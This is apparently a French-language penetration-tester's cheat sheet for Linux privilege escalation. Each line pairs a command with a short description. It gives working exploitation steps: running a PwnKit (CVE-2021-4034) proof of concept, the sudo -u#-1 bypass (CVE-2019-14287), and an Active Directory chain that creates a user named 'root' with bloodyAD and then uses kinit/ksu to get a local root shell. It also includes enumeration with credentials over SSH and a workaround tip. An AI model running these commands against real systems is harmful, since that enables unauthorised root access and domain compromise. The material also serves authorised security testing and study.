sudo -lDescription: Identifier les commandes sudo exécutables sans mot de passe.
Privesc Linux
sudo -lDescription: Identifier les commandes sudo exécutables sans mot de passe.
find / -perm -4000 -type f 2>/dev/nullDescription: Lister les binaires SUID exploitables.
nxc ssh $TARGET -u $USER -p $PASS -x 'sudo -l'Description: Collecte distante sudoers via SSH validé.
nxc ssh $TARGET -u $USER -p $PASS -x 'id && whoami && hostname'Description: Contexte identité avant tentative d'escalade.
pkexec --version # policykit-1 < 0.105-33 = vulnérableDescription: PwnKit (CVE-2021-4034) : pkexec est SUID par défaut sur la quasi-totalité des distros, root direct sans mot de passe si la version est vulnérable.
gcc pwnkit.c -o pwnkit_exploit && ./pwnkit_exploit # PoC arthepsyDescription: Exploitation PwnKit : dépose un binaire SUID (ex: /tmp/rootbash) exploitable ensuite avec -p.
sudo -u#-1 /bin/bashDescription: CVE-2019-14287 (sudo < 1.8.28) : une règle sudoers (ALL, !root) est contournable, l'UID -1 (ou 4294967295) est mal interprété et exécute en root malgré l'exclusion explicite.
ls -la /usr/bin/ksu.mit # -rwsr-xr-x root rootDescription: CVE-2025-11561 : sur un hôte Linux joint à l'AD (SSSD) avec ksu (MIT Kerberos) en SUID, l'autorisation fait un fallback par correspondance de NOM entre le principal Kerberos et l'utilisateur cible. Un principal AD littéralement nommé 'root' est alors autorisé à devenir l'utilisateur local root.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS add user root '$PASS' --ou '$OU_AVEC_CREATE_CHILD'Description: Si on a CREATE_CHILD sur une OU quelconque, créer un utilisateur AD nommé 'root' suffit à armer l'exploit : kinit root@DOMAIN puis ksu root -n root@DOMAIN donne un shell root local. Piège : ksu -e <cmd> échoue souvent (cmd_path restreint) — lancer le shell interactif et envoyer les commandes sur stdin.